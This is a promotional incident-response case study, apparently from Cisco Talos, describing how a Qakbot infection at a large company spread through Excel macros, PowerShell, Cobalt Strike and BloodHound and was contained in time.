Cyberattacks are so sophisticated these days that even with the best education and training, employees inadvertently click links or download documents that look all too real.
Furthermore, systems are often configured to allow downloads or macros that contain malicious files because employees use these applications and documents to do their everyday work, from wherever they may be working.
This was the case for a publicly traded company with more than $8 billion in annual revenues, which was within the midst of a merger and acquisition. Fortunately, thanks to a close partnership with Cisco Talos Incident Response (CTIR), the attack was discovered and averted before any damage could be done.
The saga started when an employee inadvertently downloaded a malicious document containing the Qakbot (QBOT) trojan. This malware targets banking credentials and financial information.
Unfortunately, the host system was configured to trust and enable all macros in Excel documents coming from the Internet. So, there was no warning or notification when the user downloaded the Zip file. Once opened, a macro within the malicious Excel document downloaded a payload file from the Internet, which was then stored on the user’s machine.
Next, the adversary used PowerShell, a Microsoft task automation and configuration program, to download a penetration-testing tool — Cobalt Strike — onto the victim’s machine. Cobalt Strike is typically used by security red teams to emulate threats and demonstrate the risks around data breaches. The attacker used it to further take control of the machine and launch an open-source program called BloodHound, which cybersecurity teams use to find viruses and malware.
In this case, the ransomware attacker used BloodHound to gain access to and understand the company’s Active Directory structure, including those identifies that have administrative access to files. The object in these scenarios is to uncover attack paths that will give them full control of targeted data.
At this point, a JSON file was created in the user’s downloads folder. An analysis of the attack assumes that this JSON file was used to direct data — including valuable identity and access information — into a .CSV file.
Crisis averted
All of these steps took place in less than 10 hours of the malicious file being opened by the user. The events were observed by CTIR using telemetry within Cisco SecureX, a cloud-native platform that integrates threat intelligence in real time.
When the attacker used PowerShell to direct further downloads, CTIR sent a notification to the customer, who was then able to rapidly contain the attack and avoid damage.
“The Talos team has invested significant time and effort in us to fully understand our people and environment before an incident occurred,” said the company’s CISO. “When we were faced with a significant security incident, that trust and familiarity were the key differentiators that enabled us to successfully contain the threat and minimize damages.”
It’s critical that these relationships between third-party incident response teams and internal staff are tried and tested for preparedness, according to Brad Garnett, general manager of Incident Response at Cisco Talos Intelligence Group.
“It’s important that there is an elevated level of trust between IR team and client, and that there is an established and agreed-upon process when time is of the essence to prevent an enterprise-wide ransomware attack when an active adversary is identified” he said.